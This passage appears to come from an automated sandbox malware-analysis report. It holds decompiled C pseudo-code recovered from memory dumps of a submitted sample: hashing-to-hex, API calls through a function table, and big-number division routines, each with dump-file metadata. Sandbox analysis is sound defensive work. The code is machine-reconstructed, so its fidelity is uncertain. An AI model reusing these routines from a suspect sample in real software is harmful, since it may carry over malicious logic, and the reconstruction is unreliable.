    					_push( &_v8);
    					_push(_t50);
    					if( *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1f4))))() != 0x6f) {
    						L6:
    						_t14 = _t50 + 8; // 0x8
    						if(E003CF720(_t14, 0x194,  &_v12,  &_v16, 0x800c) != 0) {
    							_t41 = E003D1D90(2 + _v16 * 4, _t67);
    							_t71 = _t69 + 8;
    							 *((intOrPtr*)(_t65 + 0x28)) = _t41;
    							if(_t41 == _t67) {
    								goto L7;
    							} else {
    								do {
    									_t22 = _t65 + 0x28; // 0xf003e85
    									E003D0C10( *_t22 + _t67 * 4, 0x100, L"%02X",  *(_t67 + _v12) & 0x000000ff);
    									_t67 = _t67 + 1;
    									_t71 = _t71 + 0x10;
    								} while (_t67 < 0x20);
    								_t25 = _t65 + 0x28; // 0xf003e85
    								 *((short*)( *_t25 + 0x80)) = 0;
    								_t66 = 1;
    								_t67 = 0;
    								L13:
    								_t32 = _v12;
    								if(_v12 != _t67) {
    									E003CBB40(_t32);
    									_t69 = _t69 + 4;
    								}
    								if(_t50 != _t67) {
    									E003CBB40(_t50);
    								}
    								return _t66;
    							}
    						} else {
    							L7:
    							return 0;
    						}
    					} else {
    						_t50 = E003D1D90(_v8, _t50);
    						_t69 = _t69 + 8;
    						if(_t50 == _t67) {
    							goto L12;
    						} else {
    							_t47 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t47 + 0x1f4))))(_t50,  &_v8);
    							goto L6;
    						}
    					}
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 67%
    			E003CBA40(void* __ecx, intOrPtr _a4, char _a8, intOrPtr* _a12, intOrPtr* _a16) {
    				char _v8;
    				void* _t15;
    				intOrPtr _t18;
    				void* _t23;
    				intOrPtr _t24;
    				intOrPtr _t33;
    				void* _t36;
    				intOrPtr _t37;
    				intOrPtr _t42;
    
    				_t24 = _a4;
    				_t3 =  &_a8; // 0x3d094a
    				_t37 =  *_t3;
    				 *_a16 = 0;
    				_t33 =  *0x3e8628; // 0x622508
    				_v8 = 0;
    				_t15 =  *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x1cc))))(_t24, _t37, 1, 0,  &_v8, 0, 0, _t36, _t23, __ecx);
    				if(_t15 != 0) {
    					_t42 = E003D1D90(_v8, 0);
    					if(_t42 == 0) {
    						L5:
    						return 0;
    					} else {
    						_t18 =  *0x3e8628; // 0x622508
    						_push(0);
    						_push(0);
    						_push( &_v8);
    						_push(_t42);
    						_push(7);
    						_push(_t37);
    						_push(_t24);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x1cc))))() != 0) {
    							 *_a12 = _t42;
    							 *_a16 = _v8;
    							return 1;
    						} else {
    							E003CBB40(_t42);
    							goto L5;
    						}
    					}
    				} else {
    					return _t15;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003DE04D(void* __eax, signed int __ebx, signed int __edx, intOrPtr* __esi) {
    				void* _t410;
    				void* _t412;
    				signed int _t413;
    				signed int _t420;
    				signed int _t424;
    				signed int _t426;
    				signed int _t427;
    				void* _t428;
    				signed int _t430;
    				signed int _t431;
    				signed int _t434;
    				signed int _t435;
    				signed int _t436;
    				signed int _t437;
    				signed int _t440;
    				signed int _t445;
    				signed int _t455;
    				signed int _t457;
    				signed int _t458;
    				signed int _t459;
    				void* _t460;
    				void* _t465;
    				signed int _t466;
    				signed int _t467;
    				intOrPtr _t470;
    				signed int _t471;
    				signed int _t472;
    				signed int _t473;
    				signed int _t478;
    				signed int* _t479;
    				signed int _t481;
    				unsigned int _t483;
    				unsigned int _t484;
    				signed int _t485;
    				signed int _t486;
    				signed int _t487;
    				intOrPtr _t489;
    				signed int _t491;
    				signed int _t492;
    				signed int _t495;
    				signed int _t497;
    				signed int _t498;
    				intOrPtr _t503;
    				signed int _t504;
    				signed int _t506;
    				signed int _t507;
    				signed int _t517;
    				signed int* _t518;
    				signed int _t520;
    				unsigned int _t522;
    				unsigned int _t523;
    				signed int _t524;
    				signed int _t525;
    				signed int _t526;
    				intOrPtr _t528;
    				signed int _t530;
    				signed int _t531;
    				signed int _t534;
    				signed int _t536;
    				signed int _t537;
    				intOrPtr _t542;
    				signed int _t543;
    				signed int _t545;
    				signed int _t546;
    				signed int _t558;
    				signed int _t560;
    				signed int _t562;
    				signed int _t563;
    				void* _t564;
    				void* _t568;
    				signed int _t571;
    				intOrPtr* _t573;
    				signed int _t574;
    				void* _t575;
    				signed int _t579;
    				signed int _t582;
    				signed int _t585;
    				signed int* _t586;
    				signed int _t588;
    				signed int _t589;
    				unsigned int _t597;
    				signed int _t598;
    				intOrPtr _t599;
    				signed int _t610;
    				signed int _t618;
    				signed int* _t619;
    				signed int _t621;
    				signed int _t622;
    				unsigned int _t630;
    				signed int _t631;
    				intOrPtr _t632;
    				signed int _t643;
    				signed int _t667;
    				signed int _t668;
    				signed int _t669;
    				signed int _t677;
    				signed int _t678;
    				signed int _t679;
    				void* _t691;
    				signed int _t695;
    				signed int _t697;
    				signed int _t698;
    				void* _t700;
    				signed int _t701;
    				signed int _t704;
    				signed int _t707;
    				intOrPtr _t708;
    				intOrPtr _t709;
    				signed int _t712;
    				signed int _t714;
    				signed int _t718;
    				intOrPtr _t721;
    				signed int _t724;
    				signed int _t726;
    				signed int _t730;
    				intOrPtr* _t734;
    				signed int _t736;
    				signed int _t737;
    				signed int _t741;
    				signed int _t742;
    				intOrPtr _t745;
    				signed int _t747;
    				signed int _t751;
    				void* _t755;
    				void* _t757;
    				void* _t758;
    				void* _t760;
    				void* _t761;
    
    				_t734 = __esi;
    				_t758 = _t757 + 0xc;
    				if(__eax == 0) {
    					L102:
    					E003DA6BB( *((intOrPtr*)(_t755 + 0x10)));
    					return  *(_t755 - 0x38);
    				}
    				_t410 = E003DA920(__edx,  *(_t755 - 4),  *(_t755 - 4), 0x20);
    				_t760 = _t758 + 0xc;
    				if(_t410 == 0) {
    					goto L102;
    				}
    				_t411 =  *(_t755 - 4);
    				if( *((intOrPtr*)( *(_t755 - 4) + 4)) == __ebx) {
    					__eflags = __ebx | 0xffffffff;
    					_t412 = E003D6732(_t411, __ebx | 0xffffffff);
    				} else {
    					_t412 = E003DBF04(_t411);
    				}
    				if(_t412 == 0) {
    					goto L102;
    				} else {
    					_t562 =  *(_t755 - 4);
    					_t413 =  *(_t562 + 4);
    					 *(_t755 - 0x14) =  *(_t755 - 0x14) & 0x00000000;
    					if(_t413 <= 0) {
    						L9:
    						if(( *(_t562 + 0x10) & 0x00000004) != 0 || ( *(_t755 - 0x50) & 0x00000004) != 0) {
    							 *(_t755 - 0x14) = 1;
    						}
    						if( *((intOrPtr*)(_t755 - 0x5c)) == 0) {
    							goto L102;
    						} else {
    							if( *(_t755 - 0x14) != 0) {
    								L16:
    								_t690 =  *((intOrPtr*)(_t755 + 0x10));
    								E003DA694( *((intOrPtr*)(_t755 + 0x10)));
    								 *(_t755 - 0x20) = E003DA715( *((intOrPtr*)(_t755 + 0x10)));
    								_t558 = E003DA715( *((intOrPtr*)(_t755 + 0x10)));
    								_t420 = E003DA715(_t690);
    								__eflags =  *(_t755 - 0x20);
    								_t736 = _t420;
    								 *(_t755 - 0x1c) = _t736;
    								if( *(_t755 - 0x20) == 0) {
    									L179:
    									E003DA6BB( *((intOrPtr*)(_t755 + 0x10)));
    									goto L102;
    								}
    								__eflags = _t558;
    								if(_t558 == 0) {
    									goto L179;
    								}
    								__eflags = _t736;
    								if(_t736 == 0) {
    									goto L179;
    								}
    								_t651 = _t755 - 0x60;
    								_t424 = E003D6518(_t755 - 0x60) & 0x8000001f;
    								__eflags = _t424;
    								if(_t424 < 0) {
    									_t424 = (_t424 - 0x00000001 | 0xffffffe0) + 1;
    									__eflags = _t424;
    								}
    								_t691 = 0x20;
    								_t692 = _t691 - _t424;
    								_t426 = E003DA920(_t651, _t736, _t755 - 0x60, _t691 - _t424);
    								_t761 = _t760 + 0xc;
    								__eflags = _t426;
    								if(_t426 == 0) {
    									goto L179;
    								} else {
    									 *(_t736 + 0xc) =  *(_t736 + 0xc) & 0x00000000;
    									_t427 = E003DA920(_t651, _t558,  *(_t755 - 4), _t692 + 0x20);
    									_t760 = _t761 + 0xc;
    									__eflags = _t427;
    									if(_t427 == 0) {
    										goto L179;
    									}
    									 *(_t558 + 0xc) =  *(_t558 + 0xc) & 0x00000000;
    									__eflags =  *(_t755 - 0x14);
    									if( *(_t755 - 0x14) == 0) {
    										L38:
    										_t563 =  *(_t755 - 0x1c);
    										_t737 =  *(_t563 + 4);
    										_t428 =  *_t558;
    										_t564 =  *_t563;
    										 *(_t755 - 0x68) =  *(_t755 - 0x68) & 0x00000000;
    										_t695 =  *(_t558 + 4) - _t737;
    										 *((intOrPtr*)(_t755 - 0x74)) = _t428 + _t695 * 4;
    										 *((intOrPtr*)(_t755 - 0x6c)) =  *((intOrPtr*)(_t558 + 8)) - _t695;
    										 *(_t755 - 0x64) =  *(_t558 + 0x10) | 0x00000002;
    										 *(_t755 - 0x30) = _t737;
    										 *(_t755 - 0x2c) = _t695;
    										 *(_t755 - 0x70) = _t737;
    										 *(_t755 - 0x18) =  *(_t564 + _t737 * 4 - 4);
    										__eflags = _t737 - 1;
    										if(_t737 != 1) {
    											 *(_t755 - 0x28) =  *(_t564 + _t737 * 4 - 8);
    										} else {
    											 *(_t755 - 0x28) =  *(_t755 - 0x28) & 0x00000000;
    										}
    										 *(_t755 - 0x10) = _t428 +  *(_t558 + 4) * 4 - 4;
    										_t430 =  *(_t755 - 4);
    										 *(_t430 + 0xc) =  *(_t430 + 0xc) ^  *(_t755 - 0x54);
    										_t568 = _t695 + 1;
    										__eflags = _t568 -  *((intOrPtr*)(_t430 + 8));
    										if(_t568 >  *((intOrPtr*)(_t430 + 8))) {
    											_t430 = E003D665B(_t568, _t430);
    											_t695 =  *(_t755 - 0x2c);
    											_t737 =  *(_t755 - 0x30);
    										}
    										__eflags = _t430;
    										if(_t430 == 0) {
    											goto L179;
    										} else {
    											_t431 =  *(_t755 - 4);
    											 *((intOrPtr*)(_t431 + 4)) = _t695 -  *(_t755 - 0x14);
    											_t571 =  *(_t755 - 0x20);
    											 *(_t755 - 0xc) =  *_t431 + _t695 * 4 - 4;
    											_t434 = _t737 + 1;
    											 *(_t755 - 0x34) = _t434;
    											__eflags = _t434 -  *((intOrPtr*)(_t571 + 8));
    											if(_t434 >  *((intOrPtr*)(_t571 + 8))) {
    												_t435 = E003D665B( *(_t755 - 0x34), _t571);
    												_t695 =  *(_t755 - 0x2c);
    												_t737 =  *(_t755 - 0x30);
    											} else {
    												_t435 = _t571;
    											}
    											__eflags = _t435;
    											if(_t435 == 0) {
    												goto L179;
    											} else {
    												__eflags =  *(_t755 - 0x14);
    												if( *(_t755 - 0x14) == 0) {
    													_t536 = E003D687A(_t755 - 0x74,  *(_t755 - 0x1c));
    													__eflags = _t536;
    													if(_t536 < 0) {
    														_t537 =  *(_t755 - 4);
    														_t118 = _t537 + 4;
    														 *_t118 =  *(_t537 + 4) - 1;
    														__eflags =  *_t118;
    													} else {
    														E003D70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x1c)), _t737);
    														 *( *(_t755 - 0xc)) = 1;
    													}
    												}
    												_t436 =  *(_t755 - 4);
    												__eflags =  *(_t436 + 4);
    												if( *(_t436 + 4) != 0) {
    													_t124 = _t755 - 0xc;
    													 *_t124 =  *(_t755 - 0xc) - 4;
    													__eflags =  *_t124;
    												} else {
    													 *(_t436 + 0xc) =  *(_t436 + 0xc) & 0x00000000;
    												}
    												_t697 = _t695 - 1;
    												__eflags = _t697;
    												if(_t697 <= 0) {
    													L76:
    													_t437 =  *(_t558 + 4);
    													_t658 = 0;
    													__eflags = _t437;
    													if(_t437 <= 0) {
    														L80:
    														__eflags =  *(_t755 - 0x14) - _t658;
    														if( *(_t755 - 0x14) == _t658) {
    															L85:
    															E003DA6BB( *((intOrPtr*)(_t755 + 0x10)));
    															_t734 =  *((intOrPtr*)(_t755 + 8));
    															_t698 =  *(_t755 - 4);
    															L86:
    															if( *((intOrPtr*)(_t698 + 4)) <= 0) {
    																_t440 = 0;
    																__eflags = 0;
    															} else {
    																_t440 =  *((intOrPtr*)( *_t698));
    															}
    															 *(_t734 + 0x44) =  *(_t734 + 0x44) & 0x00000000;
    															 *((intOrPtr*)(_t734 + 0x40)) = _t440;
    															E003D6732( *((intOrPtr*)(_t755 - 8)), 0);
    															_t740 =  *_t734 +  *_t734;
    															if( *_t734 +  *_t734 < 0 || E003D68B4( *((intOrPtr*)(_t755 - 8)), _t740, _t658) == 0) {
    																goto L102;
    															} else {
    																_t573 =  *((intOrPtr*)(_t755 - 8));
    																_t445 =  *(_t573 + 4);
    																 *(_t755 - 0x10) =  *(_t755 - 0x10) & 0;
    																if(_t445 <= 0) {
    																	L94:
    																	if(( *(_t573 + 0x10) & 0x00000004) != 0 || ( *( *((intOrPtr*)(_t755 - 0x24)) + 0x10) & 0x00000004) != 0) {
    																		 *(_t755 - 0x10) = 1;
    																	}
    																	_t446 =  *((intOrPtr*)(_t755 - 0x24));
    																	if( *((intOrPtr*)( *((intOrPtr*)(_t755 - 0x24)) + 4)) == 0) {
    																		goto L102;
    																	} else {
    																		if( *(_t755 - 0x10) != 0 || E003D687A( *((intOrPtr*)(_t755 - 8)), _t446) >= 0) {
    																			_t699 =  *((intOrPtr*)(_t755 + 0x10));
    																			E003DA694( *((intOrPtr*)(_t755 + 0x10)));
    																			 *(_t755 - 0x18) = E003DA715( *((intOrPtr*)(_t755 + 0x10)));
    																			_t560 = E003DA715( *((intOrPtr*)(_t755 + 0x10)));
    																			_t741 = E003DA715(_t699);
    																			 *(_t755 - 0x1c) = _t741;
    																			_t455 = E003DA715(_t699);
    																			__eflags =  *(_t755 - 0x18);
    																			 *(_t755 - 4) = _t455;
    																			if( *(_t755 - 0x18) == 0) {
    																				goto L179;
    																			}
    																			__eflags = _t560;
    																			if(_t560 == 0) {
    																				goto L179;
    																			}
    																			__eflags = _t741;
    																			if(_t741 == 0) {
    																				goto L179;
    																			}
    																			__eflags = _t455;
    																			if(_t455 == 0) {
    																				goto L179;
    																			}
    																			_t659 =  *((intOrPtr*)(_t755 - 0x24));
    																			_t457 = E003D6518( *((intOrPtr*)(_t755 - 0x24))) & 0x8000001f;
    																			__eflags = _t457;
    																			if(_t457 < 0) {
    																				_t457 = (_t457 - 0x00000001 | 0xffffffe0) + 1;
    																				__eflags = _t457;
    																			}
    																			_t700 = 0x20;
    																			_t701 = _t700 - _t457;
    																			_t458 = E003DA920(_t659, _t741, _t659, _t701);
    																			__eflags = _t458;
    																			if(_t458 == 0) {
    																				goto L179;
    																			} else {
    																				 *(_t741 + 0xc) =  *(_t741 + 0xc) & 0x00000000;
    																				 *((intOrPtr*)(_t755 - 0x48)) = _t701 + 0x20;
    																				_t459 = E003DA920(_t659, _t560,  *((intOrPtr*)(_t755 - 8)), _t701 + 0x20);
    																				__eflags = _t459;
    																				if(_t459 == 0) {
    																					goto L179;
    																				}
    																				 *(_t560 + 0xc) =  *(_t560 + 0xc) & 0x00000000;
    																				__eflags =  *(_t755 - 0x10);
    																				if( *(_t755 - 0x10) == 0) {
    																					L128:
    																					_t574 =  *(_t755 - 0x1c);
    																					_t742 =  *(_t574 + 4);
    																					_t460 =  *_t560;
    																					_t575 =  *_t574;
    																					 *(_t755 - 0x68) =  *(_t755 - 0x68) & 0x00000000;
    																					_t704 =  *(_t560 + 4) - _t742;
    																					 *((intOrPtr*)(_t755 - 0x74)) = _t460 + _t704 * 4;
    																					 *((intOrPtr*)(_t755 - 0x6c)) =  *((intOrPtr*)(_t560 + 8)) - _t704;
    																					 *(_t755 - 0x64) =  *(_t560 + 0x10) | 0x00000002;
    																					_t665 =  *(_t575 + _t742 * 4 - 4);
    																					 *(_t755 - 0x30) = _t742;
    																					 *(_t755 - 0x34) = _t704;
    																					 *(_t755 - 0x70) = _t742;
    																					 *(_t755 - 0x20) =  *(_t575 + _t742 * 4 - 4);
    																					__eflags = _t742 - 1;
    																					if(_t742 != 1) {
    																						 *(_t755 - 0x2c) =  *(_t575 + _t742 * 4 - 8);
    																					} else {
    																						 *(_t755 - 0x2c) =  *(_t755 - 0x2c) & 0x00000000;
    																					}
    																					 *(_t755 - 0x14) = _t460 +  *(_t560 + 4) * 4 - 4;
    																					_t579 =  *(_t755 - 4);
    																					 *(_t579 + 0xc) =  *( *((intOrPtr*)(_t755 - 0x24)) + 0xc) ^  *( *((intOrPtr*)(_t755 - 8)) + 0xc);
    																					_t465 = _t704 + 1;
    																					__eflags = _t465 -  *((intOrPtr*)(_t579 + 8));
    																					if(_t465 >  *((intOrPtr*)(_t579 + 8))) {
    																						_t466 = E003D665B(_t465,  *(_t755 - 4));
    																						_t704 =  *(_t755 - 0x34);
    																						_t742 =  *(_t755 - 0x30);
    																					} else {
    																						_t466 = _t579;
    																					}
    																					__eflags = _t466;
    																					if(_t466 == 0) {
    																						goto L179;
    																					} else {
    																						_t467 =  *(_t755 - 4);
    																						 *((intOrPtr*)(_t467 + 4)) = _t704 -  *(_t755 - 0x10);
    																						_t582 =  *(_t755 - 0x18);
    																						 *(_t755 - 0x28) =  *_t467 + _t704 * 4 - 4;
    																						_t470 = _t742 + 1;
    																						 *((intOrPtr*)(_t755 - 0x24)) = _t470;
    																						__eflags = _t470 -  *((intOrPtr*)(_t582 + 8));
    																						if(_t470 >  *((intOrPtr*)(_t582 + 8))) {
    																							_t471 = E003D665B( *((intOrPtr*)(_t755 - 0x24)),  *(_t755 - 0x18));
    																							_t704 =  *(_t755 - 0x34);
    																							_t742 =  *(_t755 - 0x30);
    																						} else {
    																							_t471 = _t582;
    																						}
    																						__eflags = _t471;
    																						if(_t471 == 0) {
    																							goto L179;
    																						} else {
    																							__eflags =  *(_t755 - 0x10);
    																							if( *(_t755 - 0x10) == 0) {
    																								_t665 =  *(_t755 - 0x1c);
    																								_t497 = E003D687A(_t755 - 0x74,  *(_t755 - 0x1c));
    																								__eflags = _t497;
    																								if(_t497 < 0) {
    																									_t498 =  *(_t755 - 4);
    																									_t325 = _t498 + 4;
    																									 *_t325 =  *(_t498 + 4) - 1;
    																									__eflags =  *_t325;
    																								} else {
    																									_t665 =  *( *(_t755 - 0x1c));
    																									E003D70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x1c)), _t742);
    																									 *( *(_t755 - 0x28)) = 1;
    																								}
    																							}
    																							_t472 =  *(_t755 - 4);
    																							__eflags =  *(_t472 + 4);
    																							if( *(_t472 + 4) != 0) {
    																								_t331 = _t755 - 0x28;
    																								 *_t331 =  *(_t755 - 0x28) - 4;
    																								__eflags =  *_t331;
    																							} else {
    																								 *(_t472 + 0xc) =  *(_t472 + 0xc) & 0x00000000;
    																							}
    																							_t707 = _t704 - 1;
    																							__eflags = _t707;
    																							if(_t707 <= 0) {
    																								L167:
    																								_t473 =  *(_t560 + 4);
    																								__eflags = _t473;
    																								if(_t473 <= 0) {
    																									L171:
    																									_t745 =  *((intOrPtr*)(_t755 - 8));
    																									_t708 =  *((intOrPtr*)(_t745 + 0xc));
    																									E003DAA38( *((intOrPtr*)(_t755 - 0x48)), _t560, _t665, _t745);
    																									__eflags =  *(_t745 + 4);
    																									if( *(_t745 + 4) != 0) {
    																										 *((intOrPtr*)(_t745 + 0xc)) = _t708;
    																									}
    																									__eflags =  *(_t755 - 0x10);
    																									if( *(_t755 - 0x10) == 0) {
    																										L178:
    																										E003DA6BB( *((intOrPtr*)(_t755 + 0x10)));
    																										goto L101;
    																									}
    																									_t478 =  *(_t755 - 4);
    																									_t585 =  *(_t478 + 4);
    																									__eflags = _t585;
    																									if(_t585 <= 0) {
    																										goto L178;
    																									}
    																									_t586 =  *_t478 + _t585 * 4 - 4;
    																									while(1) {
    																										_t747 =  *_t586;
    																										_t586 = _t586 - 4;
    																										__eflags = _t747;
    																										if(_t747 != 0) {
    																											goto L178;
    																										}
    																										 *(_t478 + 4) =  *(_t478 + 4) - 1;
    																										__eflags =  *(_t478 + 4);
    																										if( *(_t478 + 4) > 0) {
    																											continue;
    																										}
    																										goto L178;
    																									}
    																									goto L178;
    																								}
    																								_t479 =  *_t560 + _t473 * 4 - 4;
    																								while(1) {
    																									_t588 =  *_t479;
    																									_t479 = _t479 - 4;
    																									__eflags = _t588;
    																									if(_t588 != 0) {
    																										goto L171;
    																									}
    																									 *(_t560 + 4) =  *(_t560 + 4) - 1;
    																									__eflags =  *(_t560 + 4) - _t588;
    																									if( *(_t560 + 4) > _t588) {
    																										continue;
    																									}
    																									goto L171;
    																								}
    																								goto L171;
    																							} else {
    																								_t481 =  *(_t755 - 0x28) -  *(_t755 - 0x14);
    																								__eflags = _t481;
    																								 *(_t755 - 0x30) = _t707;
    																								 *(_t755 - 0x3c) = _t481;
    																								do {
    																									_t589 =  *(_t755 - 0x14);
    																									_t482 =  *_t589;
    																									_t709 =  *((intOrPtr*)(_t589 - 4));
    																									__eflags =  *_t589 -  *(_t755 - 0x20);
    																									if( *_t589 !=  *(_t755 - 0x20)) {
    																										_t483 = E003D6F02(_t482, _t709,  *(_t755 - 0x20));
    																										 *((intOrPtr*)(_t755 - 0x40)) = _t709 - _t483 *  *(_t755 - 0x20);
    																										 *(_t755 - 0xc) = _t483;
    																										_t484 =  *(_t755 - 0x2c);
    																										_t667 = _t484 & 0x0000ffff;
    																										 *(_t755 - 0x34) = _t483 & 0x0000ffff;
    																										_t712 = _t483 >> 0x10;
    																										_t485 = _t484 >> 0x10;
    																										_t668 = _t667 *  *(_t755 - 0x34);
    																										 *(_t755 - 0x44) = _t712;
    																										_t486 = _t485 *  *(_t755 - 0x44);
    																										_t714 = _t485 *  *(_t755 - 0x34);
    																										_t597 = _t667 * _t712 + _t714;
    																										 *(_t755 - 0x34) = _t714;
    																										__eflags = _t597 - _t714;
    																										if(_t597 < _t714) {
    																											_t486 = _t486 + 0x10000;
    																											__eflags = _t486;
    																										}
    																										_t598 = _t597 << 0x10;
    																										_t669 = _t668 + _t598;
    																										_t487 = _t486 + (_t597 >> 0x10);
    																										__eflags = _t669 - _t598;
    																										if(_t669 < _t598) {
    																											_t487 = _t487 + 1;
    																											__eflags = _t487;
    																										}
    																										_t599 =  *((intOrPtr*)(_t755 - 0x40));
    																										while(1) {
    																											__eflags = _t487 - _t599;
    																											if(__eflags < 0) {
    																												break;
    																											}
    																											if(__eflags != 0) {
    																												L157:
    																												_t599 = _t599 +  *(_t755 - 0x20);
    																												 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
    																												__eflags = _t599 -  *(_t755 - 0x20);
    																												if(_t599 <  *(_t755 - 0x20)) {
    																													break;
    																												}
    																												__eflags = _t669 -  *(_t755 - 0x2c);
    																												if(_t669 <  *(_t755 - 0x2c)) {
    																													_t487 = _t487 - 1;
    																													__eflags = _t487;
    																												}
    																												_t669 = _t669 -  *(_t755 - 0x2c);
    																												__eflags = _t669;
    																												continue;
    																											}
    																											_t718 =  *(_t755 - 0x14);
    																											__eflags = _t669 -  *((intOrPtr*)(_t718 - 8));
    																											if(_t669 <=  *((intOrPtr*)(_t718 - 8))) {
    																												break;
    																											}
    																											goto L157;
    																										}
    																										L162:
    																										_t717 =  *(_t755 - 0x1c);
    																										_t489 = E003D6BFB( *( *(_t755 - 0x1c)),  *( *(_t755 - 0x18)), _t742);
    																										 *((intOrPtr*)(_t755 - 0x74)) =  *((intOrPtr*)(_t755 - 0x74)) - 4;
    																										 *((intOrPtr*)( *( *(_t755 - 0x18)) + _t742 * 4)) = _t489;
    																										_t491 = E003D70EC( *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)),  *( *(_t755 - 0x18)),  *((intOrPtr*)(_t755 - 0x24)));
    																										__eflags = _t491;
    																										if(_t491 == 0) {
    																											L165:
    																											_t492 =  *(_t755 - 0x14);
    																											goto L166;
    																										}
    																										 *(_t755 - 0xc) =  *(_t755 - 0xc) - 1;
    																										_t495 = E003D6FFC( *_t717,  *((intOrPtr*)(_t755 - 0x74)),  *((intOrPtr*)(_t755 - 0x74)), _t742);
    																										__eflags = _t495;
    																										if(_t495 == 0) {
    																											goto L165;
    																										}
    																										_t492 =  *(_t755 - 0x14);
    																										 *_t492 =  *_t492 + 1;
    																										goto L166;
    																									}
    																									 *(_t755 - 0xc) =  *(_t755 - 0xc) | 0xffffffff;
    																									goto L162;
    																									L166:
    																									_t665 =  *(_t755 - 0xc);
    																									 *( *(_t755 - 0x3c) + _t492) =  *(_t755 - 0xc);
    																									_t380 = _t755 - 0x30;
    																									 *_t380 =  *(_t755 - 0x30) - 1;
    																									__eflags =  *_t380;
    																									 *(_t755 - 0x14) = _t492 - 4;
    																								} while ( *_t380 != 0);
    																								goto L167;
    																							}
    																						}
    																					}
    																				}
    																				_t503 =  *((intOrPtr*)(_t741 + 4));
    																				_t610 =  *(_t560 + 4);
    																				__eflags = _t610 - _t503 + 1;
    																				if(_t610 > _t503 + 1) {
    																					_t719 = _t610 + 1;
    																					__eflags = _t610 + 1 -  *((intOrPtr*)(_t560 + 8));
    																					if(_t610 + 1 >  *((intOrPtr*)(_t560 + 8))) {
    																						_t504 = E003D665B(_t719, _t560);
    																					} else {
    																						_t504 = _t560;
    																					}
    																					__eflags = _t504;
    																					if(_t504 == 0) {
    																						goto L179;
    																					} else {
    																						 *( *_t560 +  *(_t560 + 4) * 4) =  *( *_t560 +  *(_t560 + 4) * 4) & 0x00000000;
    																						_t260 = _t560 + 4;
    																						 *_t260 =  *(_t560 + 4) + 1;
    																						__eflags =  *_t260;
    																						goto L128;
    																					}
    																				}
    																				_t720 = _t503 + 2;
    																				__eflags = _t503 + 2 -  *((intOrPtr*)(_t560 + 8));
    																				if(_t503 + 2 >  *((intOrPtr*)(_t560 + 8))) {
    																					_t506 = E003D665B(_t720, _t560);
    																					_t741 =  *(_t755 - 0x1c);
    																				} else {
    																					_t506 = _t560;
    																				}
    																				__eflags = _t506;
    																				if(_t506 == 0) {
    																					goto L179;
    																				} else {
    																					_t507 =  *(_t560 + 4);
    																					while(1) {
    																						__eflags = _t507 -  *((intOrPtr*)(_t741 + 4)) + 2;
    																						if(_t507 >=  *((intOrPtr*)(_t741 + 4)) + 2) {
    																							break;
    																						}
    																						 *( *_t560 + _t507 * 4) =  *( *_t560 + _t507 * 4) & 0x00000000;
    																						_t507 = _t507 + 1;
    																						__eflags = _t507;
    																					}
    																					 *(_t560 + 4) =  *((intOrPtr*)(_t741 + 4)) + 2;
    																					goto L128;
    																				}
    																			}
    																		} else {
    																			if(E003D669B(_t573,  *((intOrPtr*)(_t755 - 8)),  *((intOrPtr*)(_t755 - 8))) == 0) {
    																				goto L102;
    																			}
    																			L101:
    																			 *(_t755 - 0x38) = 1;
    																			goto L102;
    																		}
    																	}
    																}
    																if( *((intOrPtr*)( *_t573 + _t445 * 4 - 4)) == 0) {
    																	goto L102;
    																}
    																_t573 =  *((intOrPtr*)(_t755 - 8));
    																goto L94;
    															}
    														}
    														_t517 =  *(_t755 - 4);
    														_t618 =  *(_t517 + 4);
    														__eflags = _t618 - _t658;
    														if(_t618 <= _t658) {
    															goto L85;
    														}
    														_t619 =  *_t517 + _t618 * 4 - 4;
    														while(1) {
    															_t751 =  *_t619;
    															_t619 = _t619 - 4;
    															__eflags = _t751;
    															if(_t751 != 0) {
    																goto L85;
    															}
    															 *(_t517 + 4) =  *(_t517 + 4) - 1;
    															__eflags =  *(_t517 + 4) - _t658;
    															if( *(_t517 + 4) > _t658) {
    																continue;
    															}
    															goto L85;
    														}
    														goto L85;
    													}
    													_t518 =  *_t558 + _t437 * 4 - 4;
    													while(1) {
    														_t621 =  *_t518;
    														_t518 = _t518 - 4;
    														__eflags = _t621;
    														if(_t621 != 0) {
    															goto L80;
    														}
    														 *(_t558 + 4) =  *(_t558 + 4) - 1;
    														__eflags =  *(_t558 + 4) - _t658;
    														if( *(_t558 + 4) > _t658) {
    															continue;
    														}
    														goto L80;
    													}
    													goto L80;
    												} else {
    													_t520 =  *(_t755 - 0xc) -  *(_t755 - 0x10);
    													__eflags = _t520;
    													 *(_t755 - 0x2c) = _t697;
    													 *(_t755 - 0x44) = _t520;
    													do {
    														_t622 =  *(_t755 - 0x10);
    														_t521 =  *_t622;
    														_t721 =  *((intOrPtr*)(_t622 - 4));
    														__eflags =  *_t622 -  *(_t755 - 0x18);
    														if( *_t622 !=  *(_t755 - 0x18)) {
    															_t522 = E003D6F02(_t521, _t721,  *(_t755 - 0x18));
    															 *((intOrPtr*)(_t755 - 0x40)) = _t721 - _t522 *  *(_t755 - 0x18);
    															 *(_t755 - 0xc) = _t522;
